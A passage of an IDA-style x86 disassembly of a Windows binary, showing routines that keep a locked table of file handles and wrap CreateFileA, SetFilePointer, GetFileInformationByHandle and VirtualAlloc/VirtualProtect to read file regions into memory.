var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E348
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
and [ebp+var_20], 0
mov eax, [ebp+arg_14]
and dword ptr [eax], 0
and [ebp+var_24], 0
mov [ebp+var_1C], 2
mov eax, ds:dword_5118E4
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_50001A
mov eax, [ebp+var_48]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_4C], 1
jmp short loc_50001E
; ---------------------------------------------------------------------------
loc_50001A: ; CODE XREF: sub_4FFFBF+46�j
and [ebp+var_4C], 0
loc_50001E: ; CODE XREF: sub_4FFFBF+59�j
movzx eax, [ebp+var_4C]
test eax, eax
jz loc_500203
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_50005E
push 0FFFFFFFFh
and [ebp+var_54], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp loc_500205
; ---------------------------------------------------------------------------
loc_50005E: ; CODE XREF: sub_4FFFBF+84�j
mov eax, [ebp+var_28]
mov eax, [eax]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
cmp ecx, [eax+8]
jbe short loc_500086
push 57h
call ds:dword_51178C ; RtlRestoreLastWin32Error
jmp loc_5001B8
; ---------------------------------------------------------------------------
loc_500086: ; CODE XREF: sub_4FFFBF+B8�j
cmp [ebp+arg_10], 0
jnz short loc_500098
mov eax, [ebp+var_30]
mov eax, [eax+8]
sub eax, [ebp+arg_C]
mov [ebp+arg_10], eax
loc_500098: ; CODE XREF: sub_4FFFBF+CB�j
mov eax, [ebp+arg_10]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_5000B3
push 57h
call ds:dword_51178C ; RtlRestoreLastWin32Error
jmp loc_5001B8
; ---------------------------------------------------------------------------
loc_5000B3: ; CODE XREF: sub_4FFFBF+E5�j
mov eax, [ebp+arg_4]
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jbe short loc_5000D7
cmp [ebp+var_58], 2
jbe short loc_5000D0
cmp [ebp+var_58], 0F001Fh
jz short loc_5000D0
jmp short loc_5000D7
; ---------------------------------------------------------------------------
loc_5000D0: ; CODE XREF: sub_4FFFBF+104�j
; sub_4FFFBF+10D�j
mov [ebp+var_1C], 4
loc_5000D7: ; CODE XREF: sub_4FFFBF+FE�j
; sub_4FFFBF+10F�j
push [ebp+var_1C]
push 1000h
push [ebp+arg_10]
push 0
call ds:dword_5117A4 ; VirtualAlloc
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_5000F8
jmp loc_5001B8
; ---------------------------------------------------------------------------
loc_5000F8: ; CODE XREF: sub_4FFFBF+132�j
cmp [ebp+var_1C], 4
jz short loc_500119
lea eax, [ebp+var_38]
push eax
push 4
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_5117AC ; VirtualProtect
test eax, eax
jnz short loc_500119
jmp loc_5001B8
; ---------------------------------------------------------------------------
loc_500119: ; CODE XREF: sub_4FFFBF+13D�j
; sub_4FFFBF+153�j
push 0
push 0
push [ebp+arg_C]
push [ebp+arg_0]
call sub_500421
and [ebp+var_34], 0
loc_50012C: ; CODE XREF: sub_4FFFBF+1B4�j
mov eax, [ebp+var_34]
cmp eax, [ebp+arg_10]
jnb short loc_500175
and [ebp+var_40], 0
lea eax, [ebp+var_3C]
push eax
push 0
lea eax, [ebp+var_40]
push eax
mov eax, [ebp+arg_10]
sub eax, [ebp+var_34]
push eax
mov eax, [ebp+var_20]
add eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_501177
test eax, eax
jz short loc_500168
cmp [ebp+var_3C], 0
jz short loc_500168
cmp [ebp+var_40], 0
jnz short loc_50016A
loc_500168: ; CODE XREF: sub_4FFFBF+19B�j
; sub_4FFFBF+1A1�j
jmp short loc_5001B8
; ---------------------------------------------------------------------------
loc_50016A: ; CODE XREF: sub_4FFFBF+1A7�j
mov eax, [ebp+var_34]
add eax, [ebp+var_40]
mov [ebp+var_34], eax
jmp short loc_50012C
; ---------------------------------------------------------------------------
loc_500175: ; CODE XREF: sub_4FFFBF+173�j
cmp [ebp+var_1C], 4
jz short loc_500194
lea eax, [ebp+var_44]
push eax
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_5117AC ; VirtualProtect
test eax, eax
jnz short loc_500194
jmp short loc_5001B8
; ---------------------------------------------------------------------------
loc_500194: ; CODE XREF: sub_4FFFBF+1BA�j
; sub_4FFFBF+1D1�j
push [ebp+var_2C]
push [ebp+var_20]
mov ecx, ds:dword_5118E0
call sub_4FC000
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_20]
mov [eax], ecx
and [ebp+var_20], 0
mov [ebp+var_24], 1
loc_5001B8: ; CODE XREF: sub_4FFFBF+C2�j
; sub_4FFFBF+EF�j ...
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_500205
; ---------------------------------------------------------------------------
loc_5001D1: ; DATA XREF: _6:0050E350�o
mov eax, ds:dword_5118E4
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jz short loc_5001EC
mov eax, [ebp+var_50]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_5001EC: ; CODE XREF: sub_4FFFBF+21E�j
cmp [ebp+var_20], 0
jz short locret_500202
push 8000h
push 0
push [ebp+var_20]
call ds:dword_5117A8 ; VirtualFree
locret_500202: ; CODE XREF: sub_4FFFBF+231�j
retn
; ---------------------------------------------------------------------------
loc_500203: ; CODE XREF: sub_4FFFBF+65�j
xor eax, eax
loc_500205: ; CODE XREF: sub_4FFFBF+9A�j
; sub_4FFFBF+210�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_4FFFBF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500216 proc near ; CODE XREF: sub_50B4A4+11�p
; sub_50B4E0+11�p
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00500333 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E358
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, ds:dword_5118E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_500262
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_500266
; ---------------------------------------------------------------------------
loc_500262: ; CODE XREF: sub_500216+37�j
and [ebp+var_2C], 0
loc_500266: ; CODE XREF: sub_500216+4A�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_500333
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_50030C
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_5116A8 ; CreateFileA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jz short loc_5002F3
push 10h
call sub_50835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
mov esi, [ebp+var_1C]
mov edi, [ebp+var_20]
movsd
movsd
movsd
movsd
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
mov [eax+8], ecx
push [ebp+var_20]
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov ecx, ds:dword_5118E4
call sub_50B98E
loc_5002F3: ; CODE XREF: sub_500216+A2�j
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_500335
; ---------------------------------------------------------------------------
loc_50030C: ; CODE XREF: sub_500216+75�j
or [ebp+var_4], 0FFFFFFFFh
call sub_500317
jmp short loc_500333
sub_500216 endp
; =============== S U B R O U T I N E =======================================
sub_500317 proc near ; CODE XREF: sub_500216+FA�p
; DATA XREF: _6:0050E360�o
mov eax, ds:dword_5118E4
mov [ebp-30h], eax
cmp dword ptr [ebp-30h], 0
jz short locret_500332
mov eax, [ebp-30h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_500332: ; CODE XREF: sub_500317+C�j
retn
sub_500317 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500216
loc_500333: ; CODE XREF: sub_500216+56�j
; sub_500216+FF�j
xor eax, eax
loc_500335: ; CODE XREF: sub_500216+F4�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_500216
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500346 proc near ; CODE XREF: sub_4FC3F3+17�p
; sub_4FF036+39�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_50153F
test eax, eax
jz loc_50041B
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_50041B
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_8], eax
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_5116A8 ; CreateFileA
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_500416
push 0
push 0
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call ds:dword_511788 ; SetFilePointer
push 10h
call sub_50835A
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+8], ecx
mov eax, [ebp+var_10]
and dword ptr [eax+4], 0
movzx eax, [ebp+arg_10]
neg eax
sbb eax, eax
and eax, 0C0000000h
add eax, 40000000h
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
push [ebp+var_10]
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov ecx, ds:dword_5118E4
call sub_4FC000
loc_500416: ; CODE XREF: sub_500346+63�j
push 1
pop eax
jmp short locret_50041D
; ---------------------------------------------------------------------------
loc_50041B: ; CODE XREF: sub_500346+20�j
; sub_500346+2C�j
xor eax, eax
locret_50041D: ; CODE XREF: sub_500346+D3�j
leave
retn 14h
sub_500346 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500421 proc near ; CODE XREF: sub_4FFFBF+164�p
; sub_505BD7+11D�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 0050065F SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E368
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
cmp [ebp+arg_C], 0
jnz short loc_500452
lea eax, [ebp+var_1C]
mov [ebp+arg_C], eax
loc_500452: ; CODE XREF: sub_500421+29�j
mov eax, ds:dword_5118E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_500473
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_500477
; ---------------------------------------------------------------------------
loc_500473: ; CODE XREF: sub_500421+3D�j
and [ebp+var_30], 0
loc_500477: ; CODE XREF: sub_500421+50�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_50065F
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_500638
mov eax, [ebp+var_24]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_5004EB
push [ebp+arg_8]
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511788 ; SetFilePointer
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_500661
; ---------------------------------------------------------------------------
loc_5004EB: ; CODE XREF: sub_500421+96�j
mov eax, [ebp+var_24]
mov eax, [eax+4]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jnz short loc_50054D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
cmp ecx, [eax+8]
jle short loc_50051E
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_500548
; ---------------------------------------------------------------------------
loc_50051E: ; CODE XREF: sub_500421+E2�j
cmp [ebp+arg_4], 0
jge short loc_500537
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_51178C ; RtlRestoreLastWin32Error
jmp short loc_500548
; ---------------------------------------------------------------------------
loc_500537: ; CODE XREF: sub_500421+101�j
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
loc_500548: ; CODE XREF: sub_500421+FB�j
; sub_500421+114�j
jmp loc_50061F
; ---------------------------------------------------------------------------
loc_50054D: ; CODE XREF: sub_500421+D7�j
cmp [ebp+arg_8], 2
jnz short loc_5005AE
cmp [ebp+arg_4], 0
jle short loc_500572
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_5005AC
; ---------------------------------------------------------------------------
loc_500572: ; CODE XREF: sub_500421+136�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
neg eax
cmp [ebp+arg_4], eax
jge short loc_500592
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_51178C ; RtlRestoreLastWin32Error
jmp short loc_5005AC
; ---------------------------------------------------------------------------
loc_500592: ; CODE XREF: sub_500421+15C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
add ecx, [eax+8]
mov eax, [ebp+var_24]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_5005AC: ; CODE XREF: sub_500421+14F�j
; sub_500421+16F�j
jmp short loc_50061F
; ---------------------------------------------------------------------------
loc_5005AE: ; CODE XREF: sub_500421+130�j
cmp [ebp+arg_8], 1
jnz short loc_500611
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_20]
cmp eax, [ecx+8]
jle short loc_5005DB
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_50060F
; ---------------------------------------------------------------------------
loc_5005DB: ; CODE XREF: sub_500421+19F�j
mov eax, [ebp+var_28]
add eax, [ebp+arg_4]
test eax, eax
jge short loc_5005F8
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_51178C ; RtlRestoreLastWin32Error
jmp short loc_50060F
; ---------------------------------------------------------------------------
loc_5005F8: ; CODE XREF: sub_500421+1C2�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_50060F: ; CODE XREF: sub_500421+1B8�j
; sub_500421+1D5�j
jmp short loc_50061F
; ---------------------------------------------------------------------------
loc_500611: ; CODE XREF: sub_500421+191�j
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 57h
call ds:dword_51178C ; RtlRestoreLastWin32Error
loc_50061F: ; CODE XREF: sub_500421:loc_500548�j
; sub_500421:loc_5005AC�j ...
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_500661
; ---------------------------------------------------------------------------
loc_500638: ; CODE XREF: sub_500421+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_500643
jmp short loc_50065F
sub_500421 endp
; =============== S U B R O U T I N E =======================================
sub_500643 proc near ; CODE XREF: sub_500421+21B�p
; DATA XREF: _6:0050E370�o
mov eax, ds:dword_5118E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_50065E
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_50065E: ; CODE XREF: sub_500643+C�j
retn
sub_500643 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500421
loc_50065F: ; CODE XREF: sub_500421+5C�j
; sub_500421+220�j
xor eax, eax
loc_500661: ; CODE XREF: sub_500421+C5�j
; sub_500421+215�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_500421
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500672 proc near ; CODE XREF: sub_501CC4+80�p
; sub_505456+58�p ...
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0050072E SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E378
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_5118E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_5006B8
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_5006BC
; ---------------------------------------------------------------------------
loc_5006B8: ; CODE XREF: sub_500672+31�j
and [ebp+var_24], 0
loc_5006BC: ; CODE XREF: sub_500672+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_50072E
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_500707
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_500730
; ---------------------------------------------------------------------------
loc_500707: ; CODE XREF: sub_500672+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_500712
jmp short loc_50072E
sub_500672 endp
; =============== S U B R O U T I N E =======================================
sub_500712 proc near ; CODE XREF: sub_500672+99�p
; DATA XREF: _6:0050E380�o
mov eax, ds:dword_5118E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_50072D
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_50072D: ; CODE XREF: sub_500712+C�j
retn
sub_500712 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500672
loc_50072E: ; CODE XREF: sub_500672+50�j
; sub_500672+9E�j
xor eax, eax
loc_500730: ; CODE XREF: sub_500672+93�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_500672
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500741 proc near ; CODE XREF: sub_4FC3F3+58�p
; sub_4FF12B+22�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E388
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jnz short loc_500772
lea eax, [ebp+var_1C]
mov [ebp+arg_4], eax
loc_500772: ; CODE XREF: sub_500741+29�j
mov eax, ds:dword_5118E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_500793
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_500797
; ---------------------------------------------------------------------------
loc_500793: ; CODE XREF: sub_500741+3D�j
and [ebp+var_2C], 0
loc_500797: ; CODE XREF: sub_500741+50�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_500845
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_500809
mov eax, [ebp+var_20]
push dword ptr [eax+8]
call ds:dword_5116A4 ; CloseHandle
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B8E0
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_5083DD
pop ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_500847
; ---------------------------------------------------------------------------
loc_500809: ; CODE XREF: sub_500741+7B�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4FF818
push 0FFFFFFFFh
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_500847
; ---------------------------------------------------------------------------
loc_500829: ; DATA XREF: _6:0050E390�o
mov eax, ds:dword_5118E4
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short locret_500844
mov eax, [ebp+var_30]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_500844: ; CODE XREF: sub_500741+F4�j
retn
; ---------------------------------------------------------------------------
loc_500845: ; CODE XREF: sub_500741+5C�j
xor eax, eax
loc_500847: ; CODE XREF: sub_500741+C6�j
; sub_500741+E6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_500741 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500858 proc near ; CODE XREF: sub_50A710+12�p
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0050093D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E398
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
cmp [ebp+arg_8], 0
jnz short loc_500889
lea eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_500889: ; CODE XREF: sub_500858+29�j
mov eax, ds:dword_5118E4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_5008AA
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_5008AE
; ---------------------------------------------------------------------------
loc_5008AA: ; CODE XREF: sub_500858+3D�j
and [ebp+var_28], 0
loc_5008AE: ; CODE XREF: sub_500858+50�j
movzx eax, [ebp+var_28]
test eax, eax
jz loc_50093D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_500916
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116FC ; GetFileInformationByHandle
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_4]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx+24h], eax
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_50093F
; ---------------------------------------------------------------------------
loc_500916: ; CODE XREF: sub_500858+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_500921
jmp short loc_50093D
sub_500858 endp
; =============== S U B R O U T I N E =======================================
sub_500921 proc near ; CODE XREF: sub_500858+C2�p
; DATA XREF: _6:0050E3A0�o
mov eax, ds:dword_5118E4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_50093C
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_50093C: ; CODE XREF: sub_500921+C�j
retn
sub_500921 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500858
loc_50093D: ; CODE XREF: sub_500858+5C�j
; sub_500858+C7�j
xor eax, eax
loc_50093F: ; CODE XREF: sub_500858+BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_500858
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500950 proc near ; CODE XREF: sub_50A741+B�p
; sub_50A77D+B�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 005009FD SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3A8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_5118E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_500996
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_50099A
; ---------------------------------------------------------------------------
loc_500996: ; CODE XREF: sub_500950+31�j
and [ebp+var_24], 0
